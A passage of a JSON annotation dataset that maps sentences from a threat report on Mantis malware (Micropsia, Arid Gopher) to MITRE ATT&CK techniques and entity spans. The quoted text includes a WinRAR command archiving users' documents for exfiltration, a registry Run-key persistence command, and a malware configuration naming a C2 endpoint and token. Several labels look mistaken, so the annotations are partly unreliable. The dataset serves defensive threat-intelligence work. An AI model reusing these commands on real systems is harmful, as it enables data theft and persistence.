"csidl_common_appdata\\microsoftservicesusermanual\\systempropertiesinternationaltime.exe\ncsidl_common_appdata\\systempropertiesinternationaltime\\systempropertiesinternationaltime.exe\ncsidl_common_appdata\\windowsnetworkmanager\\windowsnetworkmanager.exe\ncsidl_common_appdata\\windowsps\\windowsps.exe\nMicropsia is executed using WMI and its main purpose appears to be running secondary payloads for the attackers.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1047", "name": "Windows Management Instrumentation" } ], "procedure": "Executed using WMI to run secondary payloads", "entities": [ { "text": "Micropsia ", "start": 294, "end": 304, "label": "MalwareTool" }, { "text": "csidl_common_appdata\\microsoftservicesusermanual\\systempropertiesinternationaltime.exe", "start": 0, "end": 86, "label": "Infrastructure_Indicator" }, { "text": "csidl_common_appdata\\systempropertiesinternationaltime\\systempropertiesinternationaltime.exe", "start": 87, "end": 179, "label": "Infrastructure_Indicator" }, { "text": "csidl_common_appdata\\windowsnetworkmanager\\windowsnetworkmanager.exe", "start": 180, "end": 248, "label": "Infrastructure_Indicator" }, { "text": "csidl_common_appdata\\windowsps\\windowsps.exe", "start": 249, "end": 293, "label": "Infrastructure_Indicator" }, { "text": "executed ", "start": 307, "end": 316, "label": "Action" }, { "text": "running ", "start": 361, "end": 369, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s35-7ac278", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 35, "context_before": "csidl_common_appdata\\microsoftservicesusermanual\\systempropertiesinternationaltime.exe\ncsidl_common_appdata\\systempropertiesinternationaltime\\systempropertiesinternationaltime.exe\ncsidl_common_appdata\\windowsnetworkmanager\\windowsnetworkmanager.exe\ncsidl_common_appdata\\windowsps\\windowsps.exe\nMicropsia is executed using WMI and its main purpose appears to be running secondary payloads for the attackers.", "sentence_text": "These included:\nArid Gopher (file names: networkvirtualizationstartservice.exe, networkvirtualizationfiaservice.exe, networkvirtualizationseoservice.exe)\nReverse SOCKs Tunneler (aka Revsocks) (file name: windowsservicemanageav.exe)\nData Exfiltration Tool (file name: windowsupserv.exe)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-81_mitre_report-p1-s36-1c1a70", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 36, "context_before": "These included:\nArid Gopher (file names: networkvirtualizationstartservice.exe, networkvirtualizationfiaservice.exe, networkvirtualizationseoservice.exe)\nReverse SOCKs Tunneler (aka Revsocks) (file name: windowsservicemanageav.exe)\nData Exfiltration Tool (file name: windowsupserv.exe)", "sentence_text": "Two unknown files, both named hostupbroker.exe Unknown file named windowspackages.exe In addition to this, Micropsia has its own functionality, such as taking screenshots, keylogging, and archiving certain file types using WinRAR in preparation for data exfiltration:\n\"%PROGRAMDATA%\\Software Distributions\\WinRAR\\Rar.exe\"", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1113", "name": "Screen Capture" }, { "id": "T1056", "name": "Input Capture" }, { "id": "T1560", "name": "Archive Collected Data" } ], "procedure": "Takes screenshots, performs keylogging, and archives files for exfiltration", "entities": [ { "text": " hostupbroker.exe", "start": 29, "end": 46, "label": "MalwareTool" }, { "text": "windowspackages.exe", "start": 66, "end": 85, "label": "MalwareTool" }, { "text": "Micropsia ", "start": 107, "end": 117, "label": "MalwareTool" }, { "text": "WinRAR ", "start": 223, "end": 230, "label": "MalwareTool" }, { "text": "%PROGRAMDATA%\\Software Distributions\\WinRAR\\Rar.exe", "start": 269, "end": 320, "label": "Infrastructure_Indicator" }, { "text": " taking screenshots", "start": 151, "end": 170, "label": "Action" }, { "text": "keylogging", "start": 172, "end": 182, "label": "Action" }, { "text": "archiving ", "start": 188, "end": 198, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s37-54be21", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 37, "context_before": "Two unknown files, both named hostupbroker.exe Unknown file named windowspackages.exe In addition to this, Micropsia has its own functionality, such as taking screenshots, keylogging, and archiving certain file types using WinRAR in preparation for data exfiltration:\n\"%PROGRAMDATA%\\Software Distributions\\WinRAR\\Rar.exe\"", "sentence_text": "a -r -ep1 -v2500k -hp71012f4c6bdeeb73ae2e2196aa00bf59_d01247a1eaf1c24ffbc851e883e67f9b -ta2023-01-14 \"%PROGRAMDATA%\\Software Distributions\\Bdl\\LMth__C_2023-02-13 17-14-41\" \"%USERPROFILE%\\*.xls\" \"%USERPROFILE%\\*.xlsx\" \"%USERPROFILE%\\*.doc\" \"%USERPROFILE%\\*.docx\" \"%USERPROFILE%\\*.csv\" \"%USERPROFILE%\\*.pdf\" \"%USERPROFILE%\\*.ppt\" \"%USERPROFILE%\\*.pptx\" \"%USERPROFILE%\\*.odt\" \"%USERPROFILE%\\*.mdb\" \"%USERPROFILE%\\*.accdb\" \"%USERPROFILE%\\*.accde\" \"%USERPROFILE%\\*.txt\" \"%USERPROFILE%\\*.rtf\" \"%USERPROFILE%\\*.vcf\" Arid Gopher Unlike Micropsia, which is written in Delphi, Arid Gopher is written in Go.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-81_mitre_report-p1-s38-65b8e4", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 38, "context_before": "a -r -ep1 -v2500k -hp71012f4c6bdeeb73ae2e2196aa00bf59_d01247a1eaf1c24ffbc851e883e67f9b -ta2023-01-14 \"%PROGRAMDATA%\\Software Distributions\\Bdl\\LMth__C_2023-02-13 17-14-41\" \"%USERPROFILE%\\*.xls\" \"%USERPROFILE%\\*.xlsx\" \"%USERPROFILE%\\*.doc\" \"%USERPROFILE%\\*.docx\" \"%USERPROFILE%\\*.csv\" \"%USERPROFILE%\\*.pdf\" \"%USERPROFILE%\\*.ppt\" \"%USERPROFILE%\\*.pptx\" \"%USERPROFILE%\\*.odt\" \"%USERPROFILE%\\*.mdb\" \"%USERPROFILE%\\*.accdb\" \"%USERPROFILE%\\*.accde\" \"%USERPROFILE%\\*.txt\" \"%USERPROFILE%\\*.rtf\" \"%USERPROFILE%\\*.vcf\" Arid Gopher Unlike Micropsia, which is written in Delphi, Arid Gopher is written in Go.", "sentence_text": "Versions of Arid Gopher used in this campaign contain the following embedded components:\n7za.exe – A copy of the legitimate 7-Zip executable AttestationWmiProvider.exe – A tool that sets a “run” registry value ServiceHubIdentityHost.exe – A copy of legitimate Shortcut.exe executable from Optimum X Setup.env – Configuration file Arid Gopher was also used to launch the following unknown files: networkswitcherdatamodell.exe, localsecuritypolicy.exe, and networkuefidiagsbootserver.exe, in addition to being used to download and execute files obfuscated with PyArmor.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Used to launch unknown files and download/execute PyArmor-obfuscated files", "entities": [ { "text": "Arid Gopher", "start": 12, "end": 23, "label": "MalwareTool" }, { "text": "7za.exe", "start": 89, "end": 96, "label": "MalwareTool" }, { "text": "AttestationWmiProvider.exe", "start": 141, "end": 167, "label": "MalwareTool" }, { "text": "ServiceHubIdentityHost.exe", "start": 210, "end": 236, "label": "MalwareTool" }, { "text": "Shortcut.exe", "start": 260, "end": 272, "label": "MalwareTool" }, { "text": "Arid Gophe", "start": 330, "end": 340, "label": "MalwareTool" }, { "text": "networkswitcherdatamodell.exe", "start": 395, "end": 424, "label": "MalwareTool" }, { "text": "networkuefidiagsbootserver.exe", "start": 455, "end": 485, "label": "MalwareTool" }, { "text": "localsecuritypolicy.exe", "start": 426, "end": 449, "label": "MalwareTool" }, { "text": "PyArmor", "start": 559, "end": 566, "label": "MalwareTool" }, { "text": "Setup.env", "start": 299, "end": 308, "label": "Infrastructure_Indicator" }, { "text": "used to launch", "start": 351, "end": 365, "label": "Action" }, { "text": "download and execute ", "start": 516, "end": 537, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s39-555b22", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 39, "context_before": "Versions of Arid Gopher used in this campaign contain the following embedded components...", "sentence_text": "One variant of the malware was radically different from previous versions seen with most of the distinctive code updated, so much so that there was not a single subroutine that contained identical distinctive code when compared with the previous version.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-81_mitre_report-p1-s40-a58c52", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 40, "context_before": "One variant of the malware was radically different from previous versions...", "sentence_text": "Mantis appeared to be aggressively mutating the logic between variants, which is a time-intensive operation if done manually.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-81_mitre_report-p1-s41-1f186f", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 41, "context_before": "Mantis appeared to be aggressively mutating the logic between variants, which is a time-intensive operation if done manually.", "sentence_text": "The embedded setup.env file used by one analyzed variant of Arid Gopher to retrieve configuration data contained the following:\nDIR=WindowsPerceptionService\nENDPOINT=http://jumpstartmail[.]com/IURTIER3BNV4ER\nLOGS=logs.txt\nDID=code.txt\nVER=6.1\nEN=2\nST_METHOD=r\nST_MACHINE=false\nST_FLAGS=x\nCOMPRESSOR=7za.exe\nDDIR=ResourcesFiles\nBW_TOO_ID=7463b9da-7606-11ed-a1eb-0242ac120002\nSERVER_TOKEN=PDqMKZ91l2XDmDELOrKB\nSTAPP=AttestationWmiProvider.exe\nSHORT_APP=ServiceHubIdentityHost.exe\nThe setup.env configuration file mentions another file, AttestationWmiProvider.exe, which is also embedded in Arid Gopher.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Arid Gopher used an embedded setup.env file in order to load its configuration settings and C2 server information", "entities": [ { "text": "Arid Gopher ", "start": 60, "end": 72, "label": "ThreatActor" }, { "text": "setup.env ", "start": 482, "end": 492, "label": "MalwareTool" }, { "text": "AttestationWmiProvider.exe", "start": 414, "end": 440, "label": "MalwareTool" }, { "text": "7za.exe", "start": 299, "end": 306, "label": "Infrastructure_Indicator" }, { "text": "http://jumpstartmail[.]com/IURTIER3BNV4ER", "start": 166, "end": 207, "label": "Infrastructure_Indicator" }, { "text": "retrieve configuration data", "start": 75, "end": 102, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s42-e21091", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 42, "context_before": "The embedded setup.env file used by one analyzed variant of Arid Gopher to retrieve configuration data contained the following:\nDIR=WindowsPerceptionService\nENDPOINT=http://jumpstartmail[.]com/IURTIER3BNV4ER\nLOGS=logs.txt\nDID=code.txt\nVER=6.1\nEN=2\nST_METHOD=r\nST_MACHINE=false\nST_FLAGS=x\nCOMPRESSOR=7za.exe\nDDIR=ResourcesFiles\nBW_TOO_ID=7463b9da-7606-11ed-a1eb-0242ac120002\nSERVER_TOKEN=PDqMKZ91l2XDmDELOrKB\nSTAPP=AttestationWmiProvider.exe\nSHORT_APP=ServiceHubIdentityHost.exe\nThe setup.env configuration file mentions another file, AttestationWmiProvider.exe, which is also embedded in Arid Gopher.", "sentence_text": "The file is a 32-bit executable that is used as a helper to ensure that another executable will run on reboot.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "After rebooting, the malware made another file run by using a helper executable", "entities": [ { "text": "32-bit executable ", "start": 14, "end": 32, "label": "MalwareTool" }, { "text": "ensure that another executable will run on reboot", "start": 60, "end": 109, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s43-1d0bb0", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 43, "context_before": "The file is a 32-bit executable that is used as a helper to ensure that another executable will run on reboot.", "sentence_text": "When it executes, it checks for the following command-line arguments:\n\"key\" with string parameter", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "the malware is looking for a \"key\" command line", "entities": [ { "text": "checks for the following command-line arguments:", "start": 21, "end": 69, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s44-bfe6b7", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 44, "context_before": "When it executes, it checks for the following command-line arguments:\n\"key\" with string parameter", "sentence_text": "[RUN_VALUE_NAME]\n\"value\" with string parameter", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "checking for a specific parameter value", "entities": [ { "text": "[RUN_VALUE_NAME]\n\"value\" with string parameter", "start": 0, "end": 46, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s45-ce4535", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 45, "context_before": "[RUN_VALUE_NAME]\n\"value\" with string parameter", "sentence_text": "[RUN_PATHNAME]\nIt then arranges to receive notification on a signal using func os/signal.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1106", "name": "Native API" } ], "procedure": "the malware set up a signal handler to get OS signal notifications", "entities": [ { "text": "arranges to receive notification on a signal using func os/signal.", "start": 23, "end": 89, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s46-bea23d", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 46, "context_before": "[RUN_PATHNAME]\nIt then arranges to receive notification on a signal using func os/signal.", "sentence_text": "Notify().", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-81_mitre_report-p1-s47-890d5b", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 47, "context_before": "Notify().", "sentence_text": "Once notified, it sets the following registry value:\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\"[RUN_VALUE_NAME]\" = \"[RUN_PATHNAME]\" Our investigation so far shows this file setting Arid Gopher to run on reboot:\nCSIDL_COMMON_APPDATA\\attestationwmiprovider\\attestationwmiprovider.exe -key=NetworkVirtualizationStartService \"-value=CSIDL_COMMON_APPDATA\\networkvirtualizationstartservice\\networkvirtualizationstartservice.exe -x\" Exfiltration Tool", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547.001", "name": "Registry Run Keys / Startup Folder" } ], "procedure": "malware sets registry run key to start malware on reboot", "entities": [ { "text": "networkvirtualizationstartservice.exe ", "start": 407, "end": 445, "label": "MalwareTool" }, { "text": "Exfiltration Tool", "start": 449, "end": 466, "label": "MalwareTool" }, { "text": "attestationwmiprovider.exe ", "start": 278, "end": 305, "label": "MalwareTool" }, { "text": "sets the following registry value:", "start": 18, "end": 52, "label": "Action" }, { "text": "Arid Gopher ", "start": 204, "end": 216, "label": "MalwareTool" } ] }, { "uid": "mitre-81_mitre_report-p1-s48-f3a507", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 48, "context_before": "Once notified, it sets the following registry value:\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\"[RUN_VALUE_NAME]\" = \"[RUN_PATHNAME]\" Our investigation so far shows this file setting Arid Gopher to run on reboot:\nCSIDL_COMMON_APPDATA\\attestationwmiprovider\\attestationwmiprovider.exe -key=NetworkVirtualizationStartService \"-value=CSIDL_COMMON_APPDATA\\networkvirtualizationstartservice\\networkvirtualizationstartservice.exe -x\" Exfiltration Tool", "sentence_text": "The attackers also used a custom tool to exfiltrate data stolen from targeted organizations: a 64-bit PyInstaller executable named WindowsUpServ.exe.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" } ], "procedure": "attackers used a custom tool to exfiltrate data", "entities": [ { "text": "The attackers", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "WindowsUpServ.exe", "start": 131, "end": 148, "label": "MalwareTool" }, { "text": "PyInstaller executable ", "start": 102, "end": 125, "label": "MalwareTool" }, { "text": "exfiltrate data stolen from targeted organizations", "start": 41, "end": 91, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s49-ad5581", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 49, "context_before": "The attackers also used a custom tool to exfiltrate data stolen from targeted organizations: a 64-bit PyInstaller executable named WindowsUpServ.exe.", "sentence_text": "For each \"-d\" \"[FILE_DIRECTORY]\" command-line argument, the tool obtains a list of files stored in the folder [FILE_DIRECTORY] and uploads the content of each file.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1020", "name": "Automated Exfiltration" } ], "procedure": "tool collects files from directories and uploads their contents", "entities": [ { "text": "obtains a list of files stored in the folder [FILE_DIRECTORY] and uploads the content of each file", "start": 65, "end": 163, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s50-ef0947", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 50, "context_before": "For each \"-d\" \"[FILE_DIRECTORY]\" command-line argument, the tool obtains a list of files stored in the folder [FILE_DIRECTORY] and uploads the content of each file.", "sentence_text": "When uploading each file, the tools sends an HTTP POST request to a C&C server with the following parameters:\n\"kjdfnqweb\":", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Uploads file data by sending HTTP POST requests to a command-and-control server.", "entities": [ { "text": "sends an HTTP POST request to a C&C server", "start": 36, "end": 78, "label": "Action" }, { "text": "C&C server", "start": 68, "end": 78, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-81_mitre_report-p1-s51-7ed51d", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 51, "context_before": "When uploading each file, the tools sends an HTTP POST request to a C&C server with the following parameters:\n\"kjdfnqweb\":", "sentence_text": "[THE_FILE_CONTENT]\n\"qyiwekq\": [HOSTNAME_OF_THE_AFFECTED_COMPUTER]\nWhenever the remote server responds with the status code 200, the malware deletes the uploaded file from the local disk.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1104", "name": "Multi-Stage Channels" } ], "procedure": "the tool deletes the file once the C2 server returns a 200 status", "entities": [ { "text": "remote server ", "start": 79, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "deletes the uploaded file from the local disk.", "start": 140, "end": 186, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s52-4412e0", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 52, "context_before": "[THE_FILE_CONTENT]\n\"qyiwekq\": [HOSTNAME_OF_THE_AFFECTED_COMPUTER]\nWhenever the remote server responds with the status code 200, the malware deletes the uploaded file from the local disk.", "sentence_text": "The malware may also log some of its actions in the following files:\n\"C:\\ProgramData\\WindowsUpServ\\success.txt\"\n\"C:\\ProgramData\\WindowsUpServ\\err.txt\"\nDetermined Adversary\nMantis appears to be a determined adversary, willing to put time and effort into maximizing its chances of success, as evidenced by extensive malware rewriting and its decision to compartmentalize attacks against single organizations into multiple separate strands to reduce the chances of the entire operation being detected.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "the malware logs its actions into success and error text files", "entities": [ { "text": "Mantis ", "start": 172, "end": 179, "label": "ThreatActor" }, { "text": "malware rewriting ", "start": 314, "end": 332, "label": "Action" }, { "text": "WindowsUpServ", "start": 85, "end": 98, "label": "MalwareTool" }, { "text": "log some of its actions", "start": 21, "end": 44, "label": "Action" }, { "text": " compartmentalize attacks ", "start": 351, "end": 377, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s53-e4df3d", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 53, "context_before": "The malware may also log some of its actions in the following files:\n\"C:\\ProgramData\\WindowsUpServ\\success.txt\"\n\"C:\\ProgramData\\WindowsUpServ\\err.txt\"\nDetermined Adversary\nMantis appears to be a determined adversary, willing to put time and effort into maximizing its chances of success, as evidenced by extensive malware rewriting and its decision to compartmentalize attacks against single organizations into multiple separate strands to reduce the chances of the entire operation being detected.", "sentence_text": "Protection/Mitigation", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-81_mitre_report-p1-s54-98f78c", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 54, "context_before": "Protection/Mitigation", "sentence_text": "We encourage you to share your thoughts on your favorite social platform.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-81_mitre_report-p1-s55-0150ec", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 55, "context_before": "We encourage you to share your thoughts on your favorite social platform.", "sentence_text": "Min Read Grayling:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-81_mitre_report-p1-s56-b97e31", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 56, "context_before": "Min Read Grayling:", "sentence_text": "Previously Unseen Threat Actor Targets Multiple Organizations in Taiwan Get Broadcom Software and Symantec Enterprise Latest Blog Posts In Your Inbox [FILTERED_TABLES_START]\n\"c\" | Perhaps related to main.exC(\"cmd\")\n\"s\" | Perhaps related to main.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "a threat actor targeted multiple organizations in Taiwan", "entities": [ { "text": "Previously Unseen Threat Actor ", "start": 0, "end": 31, "label": "ThreatActor" }, { "text": "main.exC", "start": 199, "end": 207, "label": "MalwareTool" }, { "text": "main", "start": 240, "end": 244, "label": "MalwareTool" } ] }, { "uid": "mitre-81_mitre_report-p1-s57-dfe383", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 57, "context_before": "Previously Unseen Threat Actor Targets Multiple Organizations in Taiwan Get Broadcom Software and Symantec Enterprise Latest Blog Posts In Your Inbox [FILTERED_TABLES_START]\n\"c\" | Perhaps related to main.exC(\"cmd\")\n\"s\" | Perhaps related to main.", "sentence_text": "OnDSH \"ci\" | Perhaps related to main.deviceProperties \"ps\" | Perhaps related to main.exC(\"powershell\")\n\"ra\" | Perhaps related to main.RunAWithoutW", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.001", "name": "PowerShell" } ], "procedure": "qathering device properties and executing powershell commands", "entities": [ { "text": "ci", "start": 7, "end": 9, "label": "MalwareTool" }, { "text": "ps", "start": 55, "end": 57, "label": "MalwareTool" }, { "text": "ra", "start": 104, "end": 106, "label": "MalwareTool" }, { "text": "main.deviceProperties ", "start": 32, "end": 54, "label": "MalwareTool" }, { "text": "main.exC(\"powershell\")", "start": 80, "end": 102, "label": "MalwareTool" }, { "text": "main.RunAWithoutW", "start": 129, "end": 146, "label": "MalwareTool" }, { "text": "main.exC(\"powershell\")", "start": 80, "end": 102, "label": "Action" }, { "text": "main.RunAWithoutW", "start": 129, "end": 146, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s58-c99dd1", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 58, "context_before": "OnDSH \"ci\" | Perhaps related to main.deviceProperties \"ps\" | Perhaps related to main.exC(\"powershell\")\n\"ra\" | Perhaps related to main.RunAWithoutW", "sentence_text": "\"sf\" | Perhaps related to main.updateSettings \"sl\" | Perhaps related to main.searchForLogs \"ua\" | Perhaps related to main.updateApp \"ut\" | Perhaps related to main.updateT \"pwnr\" | Perhaps related to main.exCWithoutW(\"powershell\")\n\"rapp\" | Perhaps related to main.restartApp \"gelog\" | Perhaps related to main.upAppLogs \"ufbtt\" | Perhaps related to main.collectFi \"ufofd\" | Perhaps related to main.collectFiOrFol \"bwp\" | Perhaps related to main.browDat \"cbh\" | Perhaps related to main.delBD", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.001", "name": "PowerShell" } ], "procedure": "Malware uses multiple parameters to trigger functions like searching for logs, collecting files, executing Powershell....", "entities": [ { "text": "main.updateSettings ", "start": 26, "end": 46, "label": "MalwareTool" }, { "text": "main.searchForLogs", "start": 72, "end": 90, "label": "MalwareTool" }, { "text": "main.updateApp ", "start": 117, "end": 132, "label": "MalwareTool" }, { "text": "main.updateT ", "start": 158, "end": 171, "label": "MalwareTool" }, { "text": "main.exCWithoutW(\"powershell\")", "start": 199, "end": 229, "label": "MalwareTool" }, { "text": "main.restartApp", "start": 258, "end": 273, "label": "MalwareTool" }, { "text": "main.upAppLogs ", "start": 303, "end": 318, "label": "MalwareTool" }, { "text": "main.collectFi ", "start": 347, "end": 362, "label": "MalwareTool" }, { "text": "main.collectFiOrFol ", "start": 391, "end": 411, "label": "MalwareTool" }, { "text": "main.browDat ", "start": 438, "end": 451, "label": "MalwareTool" }, { "text": "main.delBD", "start": 478, "end": 488, "label": "MalwareTool" }, { "text": "cbh", "start": 452, "end": 455, "label": "MalwareTool" }, { "text": "bwp", "start": 412, "end": 415, "label": "MalwareTool" }, { "text": "ufofd", "start": 363, "end": 368, "label": "MalwareTool" }, { "text": "ufbtt", "start": 319, "end": 324, "label": "MalwareTool" }, { "text": "gelog", "start": 275, "end": 280, "label": "MalwareTool" }, { "text": "rapp", "start": 231, "end": 235, "label": "MalwareTool" }, { "text": "pwnr", "start": 172, "end": 176, "label": "MalwareTool" }, { "text": "ut", "start": 133, "end": 135, "label": "MalwareTool" }, { "text": "ua", "start": 92, "end": 94, "label": "MalwareTool" }, { "text": "sl", "start": 47, "end": 49, "label": "MalwareTool" }, { "text": "sf", "start": 1, "end": 3, "label": "MalwareTool" }, { "text": "exCWithoutW(\"powershell\")", "start": 204, "end": 229, "label": "Action" }, { "text": "main.updateSettings ", "start": 26, "end": 46, "label": "Action" }, { "text": "main.searchForLogs ", "start": 72, "end": 91, "label": "Action" }, { "text": "main.updateApp ", "start": 117, "end": 132, "label": "Action" }, { "text": "main.restartApp", "start": 258, "end": 273, "label": "Action" }, { "text": "main.delBD", "start": 478, "end": 488, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s59-c6f79a", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 59, "context_before": "\"sf\" | Perhaps related to main.updateSettings \"sl\" | Perhaps related to main.searchForLogs \"ua\" | Perhaps related to main.updateApp \"ut\" | Perhaps related to main.updateT \"pwnr\" | Perhaps related to main.exCWithoutW(\"powershell\")\n\"rapp\" | Perhaps related to main.restartApp \"gelog\" | Perhaps related to main.upAppLogs \"ufbtt\" | Perhaps related to main.collectFi \"ufofd\" | Perhaps related to main.collectFiOrFol \"bwp\" | Perhaps related to main.browDat \"cbh\" | Perhaps related to main.delBD", "sentence_text": "\"cwr\" | Perhaps related to main.exCWithoutW(\"cmd\")\n\"gaf\" | Perhaps related to main.collectFi \"ntf\" | Perhaps related to main.collectNet \"smr\" | Perhaps related to main.updateSettings 0fb4d09a29b9ca50bc98cb1f0d23bfc21cb1ab602050ce786c86bd2bb6050311 | networkvirtualizationservice.exe | Arid Gopher 3d649b84df687da1429c2214d6f271cc9c026eb4a248254b9bfd438f4973e529 | networkvirtualizationpicservice.exe | Arid Gopher 82f734f2b1ccc44a93b8f787f5c9b4eca09efd9e8dcd90c80ab355a496208fe4", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "Malware executes Windows command line, collects files, and network date (and list file hashes)", "entities": [ { "text": "cwr", "start": 1, "end": 4, "label": "MalwareTool" }, { "text": "gaf", "start": 52, "end": 55, "label": "MalwareTool" }, { "text": "ntf", "start": 94, "end": 97, "label": "MalwareTool" }, { "text": "smr", "start": 137, "end": 140, "label": "MalwareTool" }, { "text": "main.exCWithoutW", "start": 27, "end": 43, "label": "MalwareTool" }, { "text": "main.collectFi ", "start": 78, "end": 93, "label": "MalwareTool" }, { "text": "main.collectNet ", "start": 120, "end": 136, "label": "MalwareTool" }, { "text": "main.updateSettings", "start": 163, "end": 182, "label": "MalwareTool" }, { "text": "networkvirtualizationservice.exe", "start": 250, "end": 282, "label": "MalwareTool" }, { "text": "networkvirtualizationpicservice.exe ", "start": 364, "end": 400, "label": "MalwareTool" }, { "text": "Arid Gopher", "start": 285, "end": 296, "label": "MalwareTool" }, { "text": "Arid Gopher", "start": 402, "end": 413, "label": "MalwareTool" }, { "text": "main.exCWithoutW(\"cmd\")", "start": 27, "end": 50, "label": "Action" }, { "text": "main.collectFi ", "start": 78, "end": 93, "label": "Action" }, { "text": "main.collectNet ", "start": 120, "end": 136, "label": "Action" }, { "text": "main.updateSettings", "start": 163, "end": 182, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s60-02e1c2", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 60, "context_before": "\"cwr\" | Perhaps related to main.exCWithoutW(\"cmd\")\n\"gaf\" | Perhaps related to main.collectFi \"ntf\" | Perhaps 